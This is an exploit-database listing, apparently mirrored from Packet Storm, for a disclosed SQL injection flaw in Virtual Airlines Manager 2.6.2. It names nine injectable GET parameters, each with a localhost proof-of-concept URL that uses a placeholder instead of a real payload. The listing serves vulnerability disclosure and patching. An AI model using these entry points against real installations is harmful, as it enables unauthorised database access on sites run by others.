Exploit for Virtual Airlines Manager 2.6.2 SQL Injection

Name: Exploit for Virtual Airlines Manager 2.6.2 SQL Injection
Rating: 5 (306 reviews)
2020-06-09 | CVSS 1.0
## https://sploitus.com/exploit?id=PACKETSTORM:157987
Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection  
# Google Dork: N/A  
# Date: 2020-06-08  
# Exploit Author: Kostadin Tonev  
# Vendor Homepage: http://virtualairlinesmanager.net  
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/  
# Version: 2.6.2  
# Tested on: Linux Mint  
# CVE : N/A  
  
. . . . . . . . . + .  
. . : . .. :. .___---------___.  
. . . . :.:. _".^ .^ ^. '.. :"-_. .  
. : . . .:../: . .^ :.:\.  
. . :: +. :.:/: . . . . . .:\  
. : . . _ :::/: . ^ . . .:\  
.. . . . - : :.:./. . .:\  
. . . :..|: . . ^. .:|  
. . : : ..|| . . . !:|  
. . . . ::. ::\( . :)/  
. . : . : .:.|. ###### .#######::|  
:.. . :- : .: ::|.####### ..########:|  
. . . .. . .. :\ ######## :######## :/  
. .+ :: : -.:\ ######## . ########.:/  
. .+ . . . . :.:\. ####### #######..:/  
:: . . . . ::.:..:.\ . . ..:/  
. . . .. : -::::.\. | | . .:/  
. : . . .-:.":.::.\ ..:/  
. -. . . . .: .:::.:.\. .:/  
. . . : : ....::_:..:\ ___. :/  
. . . .:. .. . .: :.:.:\ :/  
+ . . : . ::. :.:. .:.|\ .:/|  
. + . . ...:: ..| --.:|  
. . . . . . . ... :..:.."( ..)"  
. . . : . .: ::/ . .::\  
  
  
  
[1] Vulnerable GET parameter: notam_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]  
  
[2] Vulnerable GET parameter: airport=[SQLi]  
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]  
  
[3] Vulnerable GET parameter: registry_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]  
  
[4] Vulnerable GET parameter: plane_location=[SQLi]  
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]  
  
[5] Vulnerable GET parameter: hub_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]  
  
[6] Vulnerable GET parameter: pilot_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]  
  
[7] Vulnerable GET parameter: registry_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]  
  
[8] Vulnerable GET parameter: event_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]  
  
[9] Vulnerable GET parameter: tour_id=[SQLi]  
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]